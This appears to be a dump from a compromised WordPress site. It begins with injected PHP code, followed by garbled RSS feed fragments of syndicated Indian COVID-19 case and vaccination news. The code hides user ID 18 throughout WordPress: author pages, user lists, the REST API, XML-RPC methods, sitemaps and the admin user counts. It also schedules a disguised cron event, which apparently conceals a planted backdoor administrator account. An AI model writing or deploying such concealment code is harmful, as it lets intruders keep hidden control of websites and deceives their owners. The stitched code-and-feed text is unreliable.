add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post 861 New Covid-19 Cases Recorded in India in Last 24 Hours appeared first on The Edge Media.
]]>The current cases make up about 0.03% of the entire load, while the COVID-19 recoveries rate remains at 98.76%.
The post 861 New Covid-19 Cases Recorded in India in Last 24 Hours appeared first on The Edge Media.
]]>The post All Indian Adults Eligible For Booster Dose, Vaccines Available From 10 April appeared first on The Edge Media.
]]>“It has been agreed that COVID vaccine precautionary doses will be made accessible to the 18+ demographic group at private immunization centers. Precaution Dose administration to 18+ populace through Private Vaccination Centres would begin on April 10th (Sunday), 2022. Precaution Dosage is available to all who have finished 9 months since the delivery of the second dose. This service will be accessible at all Private Vaccination Centres,” according to a statement published by the Centre.
The post All Indian Adults Eligible For Booster Dose, Vaccines Available From 10 April appeared first on The Edge Media.
]]>The post Coronavirus Updates: India Logs 11,451 New Infections, Active Caseload At 1,42,826 Is Lowest in 262 Days appeared first on The Edge Media.
]]>
For the past 31 days, the daily increase in new coronavirus infections has been below 20,000, and less than 50,000 daily new cases have been reported for the past 134 days. The active cases account for 0.42 percent of all infections, the lowest since March 2020, according to the ministry, while the national COVID-19 recovery rate was 98.24 percent, the highest since March 2020.
The post Coronavirus Updates: India Logs 11,451 New Infections, Active Caseload At 1,42,826 Is Lowest in 262 Days appeared first on The Edge Media.
]]>The post India reports a daily increase of 12,428 Covid-19 cases, the lowest in 238 days appeared first on The Edge Media.
]]>
Meanwhile, the number of active cases fell to 1,63,816, the lowest level in 241 days. For the past 31 days, the daily increase in new coronavirus infections has been below 30,000, and less than 50,000 daily new cases have been reported for the past 120 days.
The post India reports a daily increase of 12,428 Covid-19 cases, the lowest in 238 days appeared first on The Edge Media.
]]>The post In the last 24 hours, India has reported 43,263 new cases appeared first on The Edge Media.
]]>
India reported 43,263 new Covid-19 cases in the last 24 hours on Thursday. According to data updated at 9 a.m. by the Union health ministry, the country’s total coronavirus tally has risen to 3,31,39,981.
Kerala reported 30,196 new cases in the last 24 hours, accounting for nearly half of all new cases. With 338 more deaths in the last 24 hours, the death toll has risen to 4,41,749 people. In the last 24 hours, there have been 2,358 new active cases. The active caseload is 3,93,614, or 1.19 percent of the total number of cases.
The post In the last 24 hours, India has reported 43,263 new cases appeared first on The Edge Media.
]]>The post The cumulative number of COVID-19 vaccine doses administered in the country has crossed 70 crore : Union Health Ministry appeared first on The Edge Media.
]]>The coronavirus has to be defeated and vaccination is the way to victory, Union Health Minister Mansukh Mandaviya said.
“Soaring higher on COVID-19 vaccination under PM (Prime Minister) @NarendraModi ji’s leadership. 70,00,00,000 vaccine doses administered to date,” he tweeted.
Congratulations to all health workers and people for this momentous achievement, he said.
India took 85 days to touch 10 crore vaccinations, 45 days to cross the 20-crore mark and 29 more days to reach 30 crore, Mr Mandaviya said.
The country took 24 days to reach 40 crore from 30 crore doses and then 20 more days to cross 50 crore vaccinations on August 6. It took 19 more days to go past the 60-crore mark and took only 13 days to reach 70 crore from 60 crore, he said on Twitter.
The countrywide vaccination drive was rolled out on January 16 with healthcare workers (HCWs) getting inoculated in the first phase. The vaccination of frontline workers (FLWs) started from February 2.
The next phase of COVID-19 vaccination commenced from March 1 for people over 60 years of age and those aged 45 and above with specified co-morbid conditions.
The country launched vaccination for all people aged more than 45 years from April 1.
The government then decided to expand its vaccination drive by allowing everyone above 18 to be vaccinated from May 1.
(Except for the headline, this story has not been edited by The Edge Media staff and is published from a syndicated feed.)
The post The cumulative number of COVID-19 vaccine doses administered in the country has crossed 70 crore : Union Health Ministry appeared first on The Edge Media.
]]>The post Covid Update: In India, 42,909 Cases Have Been Reported, Including 380 Deaths in the Last 24 Hours appeared first on The Edge Media.
]]>
According to the Union Health Ministry, active cases account for 1.15 percent of total cases, with a national COVID-19 recovery rate of 97.51 percent. The current daily positive rate is 3.02 percent. So far, 63.43 crore vaccine doses have been given out as part of the nationwide vaccination campaign.
The post Covid Update: In India, 42,909 Cases Have Been Reported, Including 380 Deaths in the Last 24 Hours appeared first on The Edge Media.
]]>The post So Far, About 63 Crore Doses of Covid Vaccination Have Been Provided in India appeared first on The Edge Media.
]]>The ministry stated that final reports for the day would be completed by late at night. The use of vaccination as a measure to protect the country’s most vulnerable populations from Covid-19 is still being examined and monitored at the highest levels, according to the ministry.
The post So Far, About 63 Crore Doses of Covid Vaccination Have Been Provided in India appeared first on The Edge Media.
]]>The post There are 37,593 New COVID-19 Cases in India appeared first on The Edge Media.
]]>Active cases account for 0.99 percent of all infections. According to the government, the national COVID-19 recovery percentage was 97.67%. In the last 24 hours, the active COVID-19 caseload has grown by 2,776 cases.
Meanwhile, sixteen of the 78 Afghan evacuees who arrived in India yesterday tested positive for the coronavirus. All 78 people have been quarantined as a precaution.
The post There are 37,593 New COVID-19 Cases in India appeared first on The Edge Media.
]]>The post In the Last 24 Hours, India has Reported 25,072 New Cases, the Lowest Number in 160 Days. appeared first on The Edge Media.
]]>With 389 mew fatalities in the last 24 hours, the death toll has risen to 434,756. Meanwhile, there are 3,33,924 active cases, accounting for 1.03 percent of all instances. The recovery rate is at its highest since March 2020, at 97.63 percent.
The post In the Last 24 Hours, India has Reported 25,072 New Cases, the Lowest Number in 160 Days. appeared first on The Edge Media.
]]>